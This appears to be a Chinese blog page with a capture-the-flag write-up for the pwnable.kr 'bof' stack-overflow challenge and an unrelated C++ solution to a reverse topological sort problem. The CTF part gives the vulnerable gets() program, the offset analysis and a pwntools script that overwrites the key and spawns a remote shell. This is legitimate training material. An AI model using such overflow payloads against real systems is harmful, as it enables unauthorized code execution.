12月前

  1. 机器学习实验4 & 5 & 机器学习作业2
  2. WEB php & MYSQL & 数据库交互
  3. 汇编实验 4 5 6 7
  4. 计网实验报告1 2 3 4 & 大作业
  5. 计组实验 3 & 4
  6. OS实验 5 & 6 & 7
  7. //编译原理 2

PWN
分析

  • 很明显是缓冲区溢出,就是构造一个读入覆盖原来传入的key的值为0xcafebabe就好,关键是怎么覆盖了

看代码

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);   // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

逆向分析

  • 先拿checksec跑一下

    说明这是一个32位ELF程序; RELRO为” Partial RELRO”,说明我们对GOT表具有写权限; Stack为”Canary
    found”说明程序启用了栈保护; NX Enabled说明开启了数据执行保护(DEP),我们很难通过shellcode来执行代码了;
    PIE Enabled说明采用了地址空间随机化。
    IDA Pro
    分析一下知道key的地址为bp+8h,overflowme的地址[bp-2ch],所以需要覆盖2ch+8h=52字节,然后构造'\x30'*52+'\xbe\xba\xfe\xca'即可,注意存储方式这里是小端存储

ShellCode

# -*- coding: utf-8 -*-
import os
import sys
from pwn import *
def dec():
    payload = '\x30'*52+'\xbe\xba\xfe\xca'
    p = remote('pwnable.kr', 9000)
    p.sendline(payload)
    p.interactive()

if __name__ == '__main__':
    dec()

FLAG

  • cat flag

题目链接

【题意】
有n个人,m个优先级a,b
表示a优先于b,并且每个人有个编号的优先级,输出顺序。
【分析】
编号最小的节点要尽量排在前面;在满足上一个条件的基础上,编号第二小的节点要尽量排在前面;在满足前两个条件的基础上,编号第三小的节点要尽量排在前面……依此类推。(注意,这和字典序是两回事,不可以混淆。)
不是字典序,自然不能每次优先队列优先最小编号出队。

这里有个例子,有三条互相平行的路径:6 → 4 → 1、 3 → 9 → 2 和 5 → 7 → 8。一条路径上的各个节点的先后关系都是不能改变的。
如果直接优先队列优先最小值的话去求的结果会是:3 5 6 4 1 7 8 9 2 0
是不符合题意要求的,因为明显可以使1号点排在更前边。
正确的顺序应该是6 4 1 3 9 2 5 7 8 0
那么我们如何去求这个结果呢,使用反向拓扑 + 优先队列(优先最大值)
这样想,我们每次优先最小的并不能保证按上述的顺序排列,但是,我们优先最大值,把编号大的点给他分配一个尽量大的一个编号,这肯定是符合要求的,最后倒序输出即可。
【Code】

#include<cstring>
#include<cstdio>
#include<cmath>
#include<iostream>
#include<algorithm>
#include<queue>
#include<vector>
#include<stack>
using namespace std;

typedef long long LL;
#define INF 0x3f3f3f3f
const int MAX_N = 100000 + 10;

vector<int> vec[MAX_N];
int d[MAX_N];
int n,m,cnt;

void toposort()
{
    priority_queue<int,vector<int>,less<int> > pq;
    stack<int> s;
    for (int i=1;i<=n;i++)
        if (d[i] == 0)
            pq.push(i);
    while (!pq.empty()){
        int x = pq.top();
        pq.pop();
        //printf("%d\n",x);
        s.push(x);
        for (int i=0;i<vec[x].size();i++){
            int u = vec[x][i];
            d[u]--;
            if (d[u]==0) pq.push(u);
        }
    }
    while (s.size() > 1){
        printf("%d ",s.top());
        s.pop();
    }
    printf("%d\n",s.top());
    s.pop();
}

int main()
{
    int Case;
    scanf("%d",&Case);
    while (Case--){
        scanf("%d%d",&n,&m);
        for (int i=0;i<=n;i++) vec[i].clear();
        memset(d,0,sizeof(d));
        int a, b;
        for (int i=0;i<m;i++){
            scanf("%d%d",&a,&b);
            d[a]++;
            vec[b].push_back(a);
        }
        cnt = 0;
        toposort();
    }
}